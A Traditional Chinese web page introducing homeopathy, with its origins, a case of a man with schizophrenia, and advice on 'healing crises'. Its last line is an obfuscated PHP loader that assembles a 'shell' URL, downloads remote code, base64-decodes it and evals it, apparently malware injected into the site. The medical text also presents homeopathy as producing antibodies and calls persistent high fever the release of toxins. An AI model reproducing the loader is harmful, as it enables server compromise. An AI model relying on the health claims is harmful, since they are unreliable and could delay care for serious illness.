收藏本站
首頁 arrow 另類醫學簡介 arrow 順勢療法 (Homeopathy)
順勢療法 (Homeopathy) 列印 E-mail
順勢療法Homeopathy
順勢療法又稱「同類療法」,是根據病人的症狀研判,以少量能引起此症狀的藥物給病人服用;由於該藥物與疾病的類型相同,因而可產生抗體來消滅疾病,把疾病治癒。

親身體驗神奇療效
從小,我的身體就經歷各種病痛,長期下來,我都是藉由自己就醫的過程,從討論病情、及醫師治療我的方式裡,去學習新的醫療知識。

順勢療法緣起
追溯順勢療法的起源,可上循至西元前五世紀醫學之父希波克拉底首次提出「疾病起因於自然力量,醫師應該鼓勵病患運用自癒能力」的觀念。直至十九世紀,歷經德國醫師帕拉切爾蘇斯及哈內曼的相關研究和努力,順勢療法真正得以發揚光大!因此我們看Homeopathy一詞的希臘原文homoios,意為「類似」,而pathos意為「苦痛」,即知順勢療法的定義是──「藉由會造成疾病的物質,或者與造成疾病相似的物質,把疾病治癒」。


順勢療法臨床實例
曾有一位年約三十歲的王先生,剛考取台北市公家事業單位,任職技術部門,同時也是某大學的博士候選人,月薪十幾萬,卻被診斷為精神分裂症,公職資格恐有喪失之虞,讓家人非常擔心。因此家人希望王先生在未被醫學中心診斷確立之前,能求得治癒的機會。

有耐心通過好轉反應
不過,在使用順勢療法之後,有些病患的病情可能會突然變得很嚴重,甚而高燒不退,如同有些嬰幼兒接種疫苗之後會有輕微發燒的症狀。此時無須太過緊張,這是藥物正在發揮效力使身體排出毒素所致。當然,若病患由於順勢療法所引起的種種變化感到憂慮,應隨時與醫師保持連繫,或詳細記錄病情的轉變,對往後的診療將更有助益。

 

所有另類醫學文字內容及案例介紹均為重點摘要
詳文,請至各大書局或網路書局購買(書泉出版社)九八年五月印行
劉大元醫師所著【不一樣的另類醫學】

 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));